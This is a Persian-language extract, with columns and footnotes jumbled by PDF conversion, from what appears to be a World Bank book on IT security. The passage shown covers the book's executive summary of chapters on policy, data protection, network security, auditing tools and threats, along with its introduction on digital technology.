‫ﻣﻜﺎﻧﻴﺰﻣﻬــﺎﻱ ﺣﻔﺎﻇــﺖ ﺍﺯ ﺩﺍﺩﻩﻫــﺎ ﺩﺭ ﻣﻘﺎﺑﻠــﻪ ﺑــﺎ ﺍﻓ ـﺸﺎﻱ‬ ‫•‬ ‫ﺷﺒﻜﻪﻫﺎﻱ ﺧﺼﻮﺻﻲ ﻭ ﺩﻭﻟﺘﻲ ﺗﺪﻭﻳﻦ ﻣﻲﺷﻮﻧﺪ؛‬
‫‪١٨‬‬
‫ﻏﻴﺮﻋﻤﺪﻱ ﺍﻃﻼﻋﺎﺕ ﻛﻪ ﺑﺎ ﻋﻨﺎﻭﻳﻦ ﻣﺤﺮﻣـﺎﻧﮕﻲ ﺩﺍﺩﻩﻫـﺎ‬ ‫ﻣﻔﺎﻫﻴﻢ ﺳﻨﺘﻲ ﻛﻪ ﺑﻪ ﻧﺤﻮﻱ ﺑـﻪ ﻗﺎﻟـﺐ ﻗـﻮﺍﻧﻴﻦ ﺭﺍﻳﺎﻧـﻪﺍﻱ‬ ‫•‬
‫)ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺩﺳﺘﺮﺳﻲ ﻛﺎﺭﺑﺮﺍﻥ ﻏﻴﺮﻣﺠﺎﺯ ﺑﻪ ﺳﻴﺴﺘﻢ ﻭ ﺗﻐﻴﻴﺮ ﺩﺍﺩﻩﻫﺎ‬
‫‪١٩‬‬
‫ﻣﻨﺘﻘﻞ ﺷﺪﻩﺍﻧﺪ؛‬
‫ﻭ ﺑﺮﻧﺎﻣﻪﻫﺎ ﺗﻮﺳﻂ ﺁﻧﻬﺎ( ﻭ ﻳﻜﭙﺎﺭﭼﮕﻲ ﺩﺍﺩﻩﻫﺎ )ﺍﻃﻤﻴﻨﺎﻥ ﺍﺯ ﺍﻳﻨﻜﻪ‬
‫ﻧﺮﻡﺍﻓﺰﺍﺭﻫـﺎ ﻭ ﺍﻃﻼﻋـﺎﺕ ﺑـﻲﻧﻘـﺺ ﻭ ﺻـﺤﻴﺢ ﺑـﺎﻗﻲﺧﻮﺍﻫﻨـﺪ ﻣﺎﻧـﺪ(‬ ‫ﻗﻮﺍﻧﻴﻦ‪ ،‬ﻣﻘﺮﺭﺍﺕ ﻭ ﺳﻴﺎﺳﺘﻬﺎﻱ ﺩﻭﻟﺘﻲ ﻛﻪ ﺑﺮ ﺍﺭﺗﻘﺎﻱ ﺍﻣﻨﻴﺖ‬ ‫•‬

‫ﺷﻨﺎﺧﺘﻪ ﻣﻲﺷﻮﻧﺪ؛‬ ‫ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭ ﻋﺮﺻﺔ ﭘﺸﺘﻴﺒﺎﻧﻲ ﺍﺯ ﻣﺼﺮﻑﻛﻨﻨـﺪﻩ‪ ،‬ﺩﺍﺩﻩﻫـﺎﻱ‬


‫ﺍﺭﺗﺒﺎﻃﺎﺕ ﺷﺨﺼﻲ‪ ،‬ﻭ ﭼﺎﺭﭼﻮﺑﻬـﺎﻱ ﺗﺠـﺎﺭﺕ ﺍﻟﻜﺘﺮﻭﻧﻴﻜـﻲ‬
‫ﺭﻭﺍﻟﻬــﺎﻳﻲ ﺑــﺮﺍﻱ ﺷﻨﺎﺳــﺎﻳﻲ‪ ،٢٠‬ﺗــﺼﺪﻳﻖ ﻫﻮﻳــﺖ‪ ،‬ﻭ ﺗﺄﻳﻴــﺪ‬ ‫•‬
‫ﺗﺄﻛﻴﺪ ﺩﺍﺭﻧﺪ؛ ﻭ‬
‫ﺍﻋﺘﺒﺎﺭ‪ ٢١‬ﻛﺎﺭﺑﺮﺍﻥ؛‬
‫ﻧﻤﻮﻧﻪﻫﺎﻳﻲ ﺍﺯ ﺳﻴﺎﺳـﺘﻬﺎ ﻭ ﻗـﻮﺍﻧﻴﻦ ﺗﻌـﺪﺍﺩﻱ ﺍﺯ ﻛـﺸﻮﺭﻫﺎ ﻭ‬ ‫•‬
‫ﻣﺸﻜﻼﺕ ﺍﻣﻨﻴﺘﻲ ﺭﺍﻳـﺞ ﺩﺭ ﺭﺍﻳﺎﻧـﻪﻫـﺎﻳﻲ ﻛـﻪ ﺑـﺮﺍﻱ ﺍﺭﺍﺋـﻪ‬ ‫•‬
‫ﻣﺮﺍﺟﻊ ﺩﺭ ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﺑﻴﻦﺍﻟﻤﻠﻠﻲ ﻣﻌﺘﺒﺮ؛‬
‫ﺧـــﺪﻣﺎﺕ ﺍﻃﻼﻋـــﺎﺗﻲ ﺑﻜـــﺎﺭ ﻣـــﻲﺭﻭﻧـــﺪ ﻭ ﺗﻨﻈﻴﻤـــﺎﺕ‬
‫ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ‪ ٢٢‬ﺑﺮﺍﻱ ﺑﻪ ﺣﺪﺍﻗﻞ ﺭﺳﺎﻧﺪﻥ ﺍﻳﻦ ﻣﺴﺎﺋﻞ؛‬ ‫ﺑﺨﺶ ﭼﻬﺎﺭﻡ ﺍﻣﻨﻴﺖ ﺭﺍ ﺍﺯ ﺩﻳﺪﮔﺎﻩ ﺣﻘﻮﻗﻲ ﻭ ﺳﻴﺎﺳـﺘﻬﺎﻱ ﻛـﻼﻥ‬
‫ﺍﺭﺯﻳﺎﺑﻲ ﻣﻲﻛﻨـﺪ‪ .‬ﺑﺨـﺶ ﭘـﻨﺠﻢ ﻧﮕـﺎﻫﻲ ﻋﻤﻴﻘﺘـﺮ ﺑـﻪ ﻟـﻮﺍﺯﻡ ﻭ‬
‫ﺍﻣﻨﻴﺖ ﺷﺒﻜﻪ ﺍﺯ ﺑﻌﺪ ﺳﺨﺖ ﺍﻓـﺰﺍﺭﻱ )ﻣﻮﺩﻣﻬـﺎ‪ ،‬ﻣـﺴﻴﺮﻳﺎﺑﻬﺎ‪ ٢٣‬ﻭ‬ ‫•‬
‫ﺭﻭﺍﻟﻬﺎﻱ ﻓﻨﻲ ﻣﻮﺭﺩ ﻧﻴﺎﺯ ﺑﺮﺍﻱ ﺗﺄﻣﻴﻦ ﺍﻣﻨﻴﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ‬
‫ﺩﺳﺘﺮﺳﻲ ﺑﻲﺳﻴﻢ( ﻭ ﻧﺮﻡﺍﻓـﺰﺍﺭﻱ )ﭘﺮﻭﺗﻜﻠﻬـﺎﻱ ﺷـﺒﻜﻪﺍﻱ ﻣﻮﺟـﻮﺩ‬
‫ﺩﺍﺭﺩ‪.‬‬
‫ﺭﻭﻱ ﺷﺒﻜﻪﻫﺎﻱ ﻣﺤﻠﻲ ﻭ ﺍﻳﻨﺘﺮﻧﺖ؛ ﻣﺜﻞ ‪(TCP/IP‬؛‬
‫ﻓﻨﺎﻭﺭﻳﻬﺎﻱ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺑـﺮﺍﻱ ﺣﻤﻠـﻪ ﺑـﻪ ﺍﻳـﺴﺘﮕﺎﻫﻬﺎﻱ‬ ‫•‬ ‫ﮔﺰﻳﺪﻩﻫﺎﻳﻲ ﺍﺯ ﺑﺨﺶ ﭘﻨﺠﻢ‬
‫ﻛﺎﺭﻱ‪ ٢٤‬ﻭ ﺳﺮﻭﻳﺲﺩﻫﻨﺪﻩﻫﺎ ﻛﻪ ﺑﻪ ﺁﻧﻬﺎ ﺗﺨﺮﻳﺐ ﺳـﺮﻭﻳﺲ‬ ‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ‬
‫)‪ ٢٥(DoS‬ﻭ ﺗﻬﺪﻳﺪﺍﺕ ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻱﺷﺪﻩ‪ ٢٦‬ﻣﻲﮔﻮﻳﻨﺪ‪.‬‬ ‫ﺑﺨﺶ ﭘﻨﺠﻢ ﺑﻪ ﺭﺍﻫﺒﺮﺍﻥ ﺷﺒﻜﻪ ﻭ ﺳﻴﺴﺘﻢ ﻛﻤـﻚ ﻣـﻲﻛﻨـﺪ ﺗـﺎ‬
‫ﺑﺘﻮﺍﻧﻨﺪ ﻭﻇﺎﻳﻒ ﺧﻮﺩ ﺭﺍ ﺑﺼﻮﺭﺕ ﻛﺎﺭﺁﻣﺪﺗﺮﻱ ﺍﻧﺠـﺎﻡ ﺩﻫﻨـﺪ‪ .‬ﺍﻳـﻦ‬
‫‪17‬‬ ‫‪Best Practices‬‬
‫‪18‬‬ ‫‪Data Confidentiality‬‬
‫ﺑﺨﺶ ﻣﺴﺎﺋﻠﻲ ﺭﺍ ﭘﻮﺷﺶ ﻣﻲﺩﻫﺪ ﻛﻪ ﺑﺎﻳـﺪ ﺩﺭ ﺳـﻄﻮﺡ ﻓﻨـﻲ ﻭ‬
‫‪19‬‬ ‫‪Data Integrity‬‬ ‫ﻼ ﺍﻳﻨﻜﻪ ﺿﻮﺍﺑﻂ ﺍﻣﻨﻴﺘﻲ ﭼﮕﻮﻧﻪ ﻧﻘـﺾ‬ ‫ﻣﺪﻳﺮﻳﺘﻲ ﺩﺭﻙ ﺷﻮﻧﺪ؛ ﻣﺜ ﹰ‬
‫‪20‬‬ ‫‪Identification‬‬
‫‪21‬‬ ‫‪Authorization‬‬ ‫ﻣﻲﺷﻮﻧﺪ ﻭ ﻳﺎ ﺭﻭﺷﻬﺎﻱ ﻣﻘﺎﺑﻠﻪ ﺑﺎ ﺗﻬﺪﻳـﺪﺍﺕ ﻛﺪﺍﻣﻨـﺪ‪ .‬ﺑﺨـﺸﻬﺎﻱ‬
‫‪22‬‬ ‫‪Servers‬‬
‫‪23‬‬ ‫‪Routers‬‬
‫‪٢٣‬‬ ‫ﺧﻼﺻﻪ ﺍﺟﺮﺍﻳﻲ‬

‫ﻣــﻲﻛﻨــﺪ‪ .‬ﺍﻳــﻦ ﻛﺘــﺎﺏ ﻫﻤﭽﻨــﻴﻦ ﺷــﺎﻣﻞ ﻣﺮﺍﺟــﻊ ﻓﺮﺍﻭﺍﻧــﻲ ﺍﺯ‬ ‫ﭼﮕــﻮﻧﮕﻲ ﺍﺳــﺘﻔﺎﺩﻩ ﺍﺯ ﺍﺑﺰﺍﺭﻫــﺎﻱ ﻣﻤﻴــﺰﻱ‪ ٢٧‬ﻭ ﻭﺭﻭﺩ ﺑــﻪ‬ ‫•‬
‫ﻣﻮﺿﻮﻋﺎﺗﻲ ﺍﺳﺖ ﻛﻪ ﺍﺑﻌﺎﺩ ﺩﻳﮕﺮ ﺍﻣﻨﻴـﺖ ﻓﻨـﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﺭﺍ‬ ‫ﺳﻴﺴﺘﻢ ﺑﺮﺍﻱ ﻛﻤﻚ ﺑﻪ ﺷﻨﺎﺳﺎﻳﻲ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺁﺳﻴﺐﭘـﺬﻳﺮ‬
‫ﭘﻮﺷﺶ ﻣﻲﺩﻫﻨﺪ ﻭ ﻟﺬﺍ ﺁﻣﻮﺧﺘﻦ ﻣﺤﺘﻮﻳﺎﺕ ﺁﻥ‪ ،‬ﮔـﺎﻣﻲ ﺩﺭ ﺟﻬـﺖ‬ ‫ﻭ ﻳﺎﻓﺘﻦ ﻣـﻮﺍﺭﺩﻱ ﻛـﻪ ﺭﻭﻱ ﺍﻳـﻦ ﺳﻴـﺴﺘﻤﻬﺎ ﺩﭼـﺎﺭ ﺗﻐﻴﻴـﺮ‬
‫ﺍﻧﺘﻘﺎﻝ ﺍﻃﻼﻋﺎﺕ ﻭ ﺗﻮﻟﻴﺪ ﻇﺮﻓﻴﺖ ﺩﺭ ﺳﻄﺢ ﻣﺤﻠﻲ ﺩﺭ ﺟﻬـﺎﻥ ﺭﻭ‬ ‫ﺷﺪﻩﺍﻧﺪ‪.‬‬
‫ﺑﻪ ﮔﺴﺘﺮﺵ ﺍﻣﺮﻭﺯ ﺑﻪ ﺣﺴﺎﺏ ﻣﻲﺁﻳﺪ‪ .‬ﺍﻳﻦ ﻛﺘـﺎﺏ ﺗﻮﺳـﻂ ﺑﺎﻧـﻚ‬ ‫ﺗﻮﺻﻴﻪﻫﺎﻱ ﻓﻨﻲ ﻭﻳـﮋﻩ ﺑـﺮﺍﻱ ﺳﻴـﺴﺘﻢ ﻋﺎﻣﻠﻬـﺎﻱ ‪،Unix‬‬ ‫•‬
‫ﺟﻬﺎﻧﻲ ﻣﻨﺘﺸﺮ ﺷـﺪﻩ ﻭ ﺩﻳـﺴﻚ ﻓـﺸﺮﺩﻩ ﻭ ﭘﺎﻳﮕـﺎﻩ ﻭﺏ ﺁﻥ ﻛـﻪ‬
‫‪ ،Windows ،Linux‬ﻭ ‪Macintosh‬‬
‫ﺣــﺎﻭﻱ ﻣﻄﺎﻟــﺐ ﺟﺪﻳــﺪ ﺩﺭ ﺍﻳــﻦ ﺯﻣﻴﻨــﻪ ﺍﺳــﺖ ﻧﻴــﺰ ﺩﺭ ﺍﺧﺘﻴــﺎﺭ‬
‫ﻋﻼﻗﻪﻣﻨﺪﺍﻥ ﻗﺮﺍﺭ ﮔﺮﻓﺘﻪ ﺍﺳﺖ‪ .‬ﺍﻭﻟـﻴﻦ ﻭﻳـﺮﺍﻳﺶ ﺍﻳـﻦ ﻛﺘـﺎﺏ ﺩﺭ‬ ‫ﺑﻪ ﺩﻟﻴﻞ ﺣﺠﻢ ﻭ ﭘﻴﭽﻴﺪﮔﻲ ﻣﻮﺿـﻮﻉ‪ ،‬ﭼﻨـﺪﻳﻦ ﺿـﻤﻴﻤﻪ ﻧﻴـﺰ ﺩﺭ‬
‫ﺍﺟﻼﺱ ﺟﻬﺎﻧﻲ ﺳـﺮﺍﻥ ﺟﺎﻣﻌـﺔ ﺍﻃﻼﻋـﺎﺗﻲ )‪ (WSIS‬ﺩﺭ ﮊﻧـﻮ ﺩﺭ‬ ‫ﺍﻧﺘﻬﺎﻱ ﻛﺘﺎﺏ ﺁﻣﺪﻩ ﺍﺳﺖ‪.‬‬
‫ﺩﺳﺎﻣﺒﺮ ‪ ۲۰۰۳‬ﻣﻴﻼﺩﻱ ﺍﺭﺍﺋﻪ ﺷﺪ‪.‬‬ ‫ﭘﻴﻮﺳﺖ ‪ ۱‬ﺣﺎﻭﻱ ﻭﺍﮊﻩﻧﺎﻣﻪﺍﻱ ﺍﺯ ﺍﺻﻄﻼﺣﺎﺕ ﺭﺍﻳﺠﻲ ﺍﺳـﺖ ﻛـﻪ‬
‫ﺑﺎﻧﻚ ﺟﻬﺎﻧﻲ ﻃﺒﻖ ﻣﻨﺸﻮﺭ ﺣﻖ ﺗﻜﺜﻴﺮ ﺟﻬﺎﻧﻲ‪ ٢٨‬ﻣﺎﻳﻞ ﺑـﻪ ﺣﻔـﻆ‬ ‫ﺩﺭ ﺣﻮﺯﺓ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋـﺎﺕ ﻭ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﻣـﻮﺭﺩ ﺍﺳـﺘﻔﺎﺩﻩ ﻗـﺮﺍﺭ‬
‫ﻗــﺎﻧﻮﻥ ﺣــﻖ ﺗﻜﺜﻴــﺮ ﺍﻳــﻦ ﻛﺘــﺎﺏ ﺍﺳــﺖ ﻭ ﺑــﻪ ﻫــﻴﭻ ﻋﻨــﻮﺍﻥ‬ ‫ﻣﻲﮔﻴﺮﻧﺪ‪ ،‬ﻭ ﭘﻴﻮﺳﺘﻬﺎﻱ ‪ ۲‬ﺗﺎ ‪ ۵‬ﻧﻴﺰ ﻣﺮﺍﺟﻊ ﻣﻮﺭﺩ ﺍﺳﺘﻔﺎﺩﻩ ﺩﺭ ﺗﻬﻴﻪ‬
‫ﻧﺴﺨﻪﺑﺮﺩﺍﺭﻱ ﻣﻄﺎﻟﺐ ﺍﻳﻦ ﻛﺘﺎﺏ ﺑﺮﺍﻱ ﺗﺤﻘﻴﻖ‪ ،‬ﺁﻣﻮﺯﺵ ﻭ ﺩﻳﮕﺮ‬ ‫ﻭ ﺗﺪﻭﻳﻦ ﻛﺘﺎﺏ ﺭﺍ ﻣﻌﺮﻓﻲ ﻧﻤﻮﺩﻩﺍﻧﺪ‪ .‬ﺍﻳﻦ ﻣﻨﺎﺑﻊ ﺷﺎﻣﻞ ﻣـﺴﺘﻨﺪﺍﺕ‬
‫ﺍﻫﺪﺍﻑ ﺟﺰ ﺩﺭ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳـﻌﺔ ﻋـﻀﻮ ﺑﺎﻧـﻚ ﺟﻬـﺎﻧﻲ‬ ‫ﭼﺎﭘﻲ‪ ،‬ﻣﺪﺍﺭﻙ ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﻓﻬﺮﺳﺘﻲ ﺍﺯ ﺳﺎﺯﻣﺎﻧﻬﺎﻳﻲ ﻛﻪ ﺩﺭﺑﺎﺭﺓ‬
‫ﻣﺠﺎﺯ ﻧﻤﻲﺑﺎﺷﺪ‪ .‬ﻳﺎﻓﺘﻪﻫﺎ‪ ،‬ﺗﻔﺎﺳﻴﺮ ﻭ ﻧﺘﺎﻳﺞ ﻣﻮﺟﻮﺩ ﺩﺭ ﺍﻳـﻦ ﻛﺘـﺎﺏ‬ ‫ﻣﺴﺎﺋﻞ ﺍﻣﻨﻴﺘﻲ ﺑﻪ ﻓﻌﺎﻟﻴﺖ ﻣﻲﭘﺮﺩﺍﺯﻧﺪ ﻫﺴﺘﻨﺪ‪ .‬ﺗﻮﺻـﻴﻪ ﻣـﻲﺷـﻮﺩ‬
‫ﻫﻤﮕﻲ ﻣﺘﻌﻠﻖ ﺑﻪ ﻧﻮﻳﺴﻨﺪﮔﺎﻥ ﻫﺴﺘﻨﺪ ﻭ ﻧﺒﺎﻳﺪ ﺁﻧﻬـﺎ ﺭﺍ ﺑـﻪ ﺑﺎﻧـﻚ‬ ‫ﺗﻤﺎﻣﻲ ﺧﻮﺍﻧﻨﺪﮔﺎﻥ ﺑﻪ ﻣﺮﺍﺟﻌﻲ ﻛﻪ ﺩﺭ ﺑﺨﺶ ﻣﻨﺎﺑﻊ ﻭ ﻣﺂﺧﺬ ﺫﻛـﺮ‬
‫ﺟﻬﺎﻧﻲ‪ ،‬ﺳﺎﺯﻣﺎﻧﻬﺎﻱ ﻭﺍﺑﺴﺘﻪ ﺑﻪ ﺁﻥ‪ ،‬ﺍﻋﻀﺎﻱ ﻫﻴـﺄﺕ ﻣـﺪﻳﺮﻩ ﻭ ﻳـﺎ‬ ‫ﺷﺪﻩﺍﻧﺪ ﺳﺮﻱ ﺑﺰﻧﻨﺪ‪.‬‬
‫ﻛﺸﻮﺭﻫﺎﻱ ﻋﻀﻮ ﻧﺴﺒﺖ ﺩﺍﺩ‪.‬‬
‫ﮔﺎﻣﻬﺎﻱ ﺁﺗﻲ ﻭ ﻧﺘﻴﺠﻪﮔﻴﺮﻱ‬
‫ﻓﻨﺎﻭﺭﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺍﺑﺰﺍﺭﻫﺎﻱ ﺟﺪﻳﺪﻱ ﺭﺍ ﺩﺭ ﺍﺧﺘﻴﺎﺭ ﻣـﺎ ﻗـﺮﺍﺭ ﺩﺍﺩﻩ‬
‫ﻛﻪ ﺗﺄﺛﻴﺮ ﻋﻤﺪﺓ ﺁﻧﻬﺎ ﺩﺭ ﺁﻣﻮﺯﺵ ﻭ ﭘﺮﻭﺭﺵ‪ ،‬ﺑﻬﺪﺍﺷﺖ‪ ،‬ﺗﺠـﺎﺭﺕ ﻭ‬
‫ﺩﻳﮕﺮ ﺑﺨﺸﻬﺎﻱ ﺟﺎﻣﻌﻪ ﻧﻤﺎﻳﺎﻥ ﺍﺳﺖ‪ .‬ﺍﻳﻦ ﻓﻨـﺎﻭﺭﻱ ﺑـﺮﺍﻱ ﺗﻤـﺎﻡ‬
‫ﻛﺸﻮﺭﻫﺎ ﻭ ﻣﺮﺩﻡ ﻣﻔﻴﺪ ﺍﺳﺖ‪ ،‬ﺍﻣﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺟﺬﺍﺑﻴﺖ ﺧﺎﺻﻲ ﺑـﺮﺍﻱ‬
‫ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ ﺩﺍﺷﺘﻪ ﺑﺎﺷﺪ ﻭ ﺑﻪ ﺁﻧﻬﺎ ﻛﻤﻚ ﻛﻨـﺪ ﺗـﺎ‬
‫ﺍﻧﺴﺠﺎﻡ ﺧﻮﺩ ﺭﺍ ﺑﻪ ﺳـﻤﺖ ﺟﺎﻣﻌـﺔ ﺍﻗﺘـﺼﺎﺩﻱ ﺟﻬـﺎﻧﻲ ﺍﻓـﺰﺍﻳﺶ‬
‫ﺩﻫﻨﺪ؛ ﻭﻟﻲ ﺩﺭ ﻋﻴﻦ ﺣﺎﻝ ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜـﺎﺭ ﺑـﺮﺍﻱ ﻛـﺸﻮﺭﻫﺎ ﻫﺰﻳﻨـﺔ‬
‫ﺯﻳـﺎﺩﻱ ﺩﺍﺭﺩ‪ .‬ﺳــﺮﻣﺎﻳﻪﮔـﺬﺍﺭﻱ ﻣــﺴﺘﻘﻴﻢ ﺧـﺎﺭﺟﻲ ﻭ ﺍﻃﻤﻴﻨــﺎﻥ ﻭ‬
‫ﺍﻋﺘﻤﺎﺩ ﺑﻪ ﻛﺸﻮﺭﻫﺎﻱ ﺩﺭﺣﺎﻝ ﺗﻮﺳﻌﻪ‪ ،‬ﺑﺴﺘﮕﻲ ﺑﻪ ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺍﻣﻦ‬
‫ﻭ ﻛﺎﺭﺁﻣﺪ ﻓﻨﺎﻭﺭﻱ ﻭ ﺯﻳﺮﺳﺎﺧﺘﻬﺎ ﺩﺍﺭﺩ‪ .‬ﺩﻭﻟﺘﻬﺎ‪ ،‬ﺳﺎﺯﻣﺎﻧﻬﺎ ﻭ ﻛﺎﺭﺑﺮﺍﻥ‬
‫ﺧﺎﻧﮕﻲ ﻫﻤﮕـﻲ ﺩﺭ ﺗـﺄﻣﻴﻦ ﺍﻣﻨﻴـﺖ ﺷـﺒﻜﻪﻫـﺎ ﻭ ﺳـﺮﻣﺎﻳﻪﻫـﺎﻱ‬
‫ﺍﻟﻜﺘﺮﻭﻧﻴﻜﻲ ﻭ ﺍﻃﻼﻋﺎﺗﻲ ﺁﻧﻬﺎ ﻧﻘﺶ ﺑﺴﺰﺍﻳﻲ ﺩﺍﺭﻧـﺪ‪ .‬ﺍﻳـﻦ ﻛﺘـﺎﺏ‬
‫ﺣﺎﻭﻱ ﻣﺠﻤﻮﻋﻪ ﺍﻱ ﺍﺯ ﺑﻬﺘـﺮﻳﻦ ﺷـﻴﻮﻩ ﻫـﺎﻱ ﺭﺍﻳـﺞ ﻭ ﺍﻟﮕﻮﻫـﺎﻱ‬
‫ﺳــﺮﺁﻣﺪﻱ ﺩﺭ ﺯﻣﻴﻨــﺔ ﺍﻣﻨﻴــﺖ ﺍﺳــﺖ ﻛــﻪ ﺑــﻪ ﺧﻮﺍﻧﻨــﺪﮔﺎﻥ ﺩﺭ‬
‫ﭘﻴﺎﺩﻩﺳﺎﺯﻱ ﺳﻴﺎﺳﺘﻬﺎ ﻭ ﺭﻭﺍﻟﻬـﺎ ‪ -‬ﺑـﺮ ﺣـﺴﺐ ﺷـﺮﺍﻳﻂ ‪ -‬ﻛﻤـﻚ‬

‫‪24‬‬ ‫‪Workstation‬‬
‫‪25‬‬ ‫‪Denial of Service‬‬
‫‪26‬‬ ‫‪Programmed Threats‬‬
‫‪28‬‬ ‫‪Universal Copyright Convention‬‬ ‫‪27‬‬ ‫‪Auditing Tools‬‬
‫ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ‬
‫ﺩﺭ ﻋﺼﺮ ﺩﻳﺠﻴﺘﺎﻝ‬
‫ﺑﺮﺍﻱ ﺍﻳﺠﺎﺩ ﻳـﻚ ﺳﻴـﺴﺘﻢ ﺍﻃﻼﻋـﺎﺗﻲ ﺟﻬـﺎﻧﻲ ﺑﻬـﺮﻩ ﺟـﺴﺘﻪ ﻭ‬
‫ﺑﻬﺮﻩﻭﺭﻱ ﻭ ﺟﺬﺍﺑﻴﺖ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﺑﻪ ﻣﺮﺍﺗﺐ ﺍﻓـﺰﺍﻳﺶ ﺩﺍﺩﻩ ﺍﺳـﺖ‪.‬‬
‫ﻫﺮ ﭼﻨﺪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺮﺩﻡ ﺗﻔـﺎﻭﺗﻲ ﻣﻴـﺎﻥ ﺷـﺒﻜﺔ ﺟﻬـﺎﻧﻲ ﻭﺏ ﻭ‬
‫ﺍﻳﻨﺘﺮﻧﺖ ﻗﺎﺋﻞ ﻧﻴـﺴﺘﻨﺪ‪ ،‬ﻭﻟـﻲ ﺩﺭ ﻭﺍﻗـﻊ ﻭﺏ ﺗﻨﻬـﺎ ﻳﻜـﻲ ﺍﺯ ﺍﻳـﻦ‬
‫ﺧﺪﻣﺎﺕ‪) ٧‬ﻭ ﺍﻟﺒﺘﻪ ﻣﻬﻤﺘﺮﻳﻦ ﺁﻧﻬﺎ( ﺍﺳﺖ ﻛﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺭﺍ ﺑﻪ ﭼﻨﻴﻦ ﺍﺑﺰﺍﺭ‬ ‫ﻣﻘﺪﻣﻪ‬
‫ﻗﺪﺭﺗﻤﻨﺪﻱ ﺑﺮﺍﻱ ﺍﻃـﻼﻉﺭﺳـﺎﻧﻲ ﻭ ﺑﺮﻗـﺮﺍﺭﻱ ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺗﺒـﺪﻳﻞ‬
‫ﻛﺮﺩﻩ ﺍﺳﺖ‪.‬‬ ‫ﻇﻬﻮﺭ ﻓﻨﺎﻭﺭﻱ ﺩﻳﺠﻴﺘﺎﻝ ﻳﻜﻲ ﺍﺯ ﺑﺎﺭﺯﺗﺮﻳﻦ ﭘﻴـﺸﺮﻓﺘﻬﺎﻱ ﻓﻨـﺎﻭﺭﻱ‬
‫ﺩﺭ ﻧﻴﻢﻗﺮﻥ ﺍﺧﻴﺮ ﺑﻪ ﺷﻤﺎﺭ ﻣﻲﺁﻳﺪ ﻛـﻪ ﺩﺭ ﺯﻧـﺪﮔﻲ ﻛﻨـﻮﻧﻲ ﺑـﺸﺮ‬
‫ﻃﻲ ﺩﻩ ﺳﺎﻝ ﺍﺧﻴﺮ ﺍﻳﻨﺘﺮﻧﺖ ﺑﻪ ﻳﻚ ﺍﺑـﺰﺍﺭ ﻣﻬـﻢ ﺍﺭﺗﺒـﺎﻃﻲ ﻣﻴـﺎﻥ‬
‫ﺑﺼﻮﺭﺕ ﻋﺎﻣﻠﻲ ﺣﻴﺎﺗﻲ ﺩﺭﺁﻣﺪﻩ ﺍﺳﺖ‪ ١.‬ﺑﺮﺍﻱ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻣﺎ ﺍﻳـﻦ‬
‫ﺗﻤﺎﻣﻲ ﺍﻗﺸﺎﺭ ﺟﺎﻣﻌﻪ ﺗﺒﺪﻳﻞ ﺷﺪﻩ ﻭ ﻣﺎ ﺑﺮﺍﻱ ﺩﺳﺘﺮﺳـﻲ ﺁﻧـﻲ ﺑـﻪ‬
‫ﻧﻮﻉ ﻓﻨﺎﻭﺭﻱ ﺩﺭ ﻗﺎﻟﺐ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺩﻳﺠﻴﺘﺎﻟﻲ ﺗﺠﻠـﻲ ﻛـﺮﺩﻩ ﻭ ﺑـﻪ‬
‫ﺍﻃﻼﻋﺎﺕ‪ ،‬ﺍﺭﺗﺒﺎﻃـﺎﺕ ﺍﺧﺘـﺼﺎﺻﻲ‪ ،‬ﺗﻤـﺎﻣﻲ ﺍﻧـﻮﺍﻉ ﺑﺮﻧﺎﻣـﻪ ﻫـﺎﻱ‬
‫ﺍﺑﺰﺍﺭﻱ ﻻﺯﻡ ﺑﺮﺍﻱ ﺍﻧﺠﺎﻡ ﻛﺎﺭﻫﺎ ﻭ ﺭﻓﻊ ﻧﻴﺎﺯﻫﺎﻱ ﺷﺨﺼﻲ ﺗﺒـﺪﻳﻞ‬
‫ﻛﺎﺭﺑﺮﺩﻱ‪ ،‬ﺗﺠﺎﺭﻱ‪ ،‬ﺭﻭﺍﺑﻂ ﻛﺎﺭﻱ ﻭ ﻧﻘﻞ ﻭ ﺍﻧﺘﻘﺎﻻﺕ ﻣﺎﻟﻲ ﺑـﻪ ﺁﻥ‬
‫ﺷﺪﻩ ﺍﺳـﺖ‪ .‬ﺩﺭ ﺳـﺎﻝ ‪ ۱۹۵۱‬ﻣـﻴﻼﺩﻱ ﺯﻣﺎﻧﻴﻜـﻪ ﺍﻭﻟـﻴﻦ ﺭﺍﻳﺎﻧـﺔ‬
‫ﻭﺍﺑﺴﺘﻪ ﺍﻳﻢ‪ .‬ﻗﺎﺑﻠﻴﺖ ﺍﻃﻤﻴﻨﺎﻥ ﻭ ﺩﺳﺘﺮﺳﻲ ﺁﺳﺎﻥ ﺑﻪ ﺍﻳﻨﺘﺮﻧﺖ ﺑﺮﺍﻱ‬
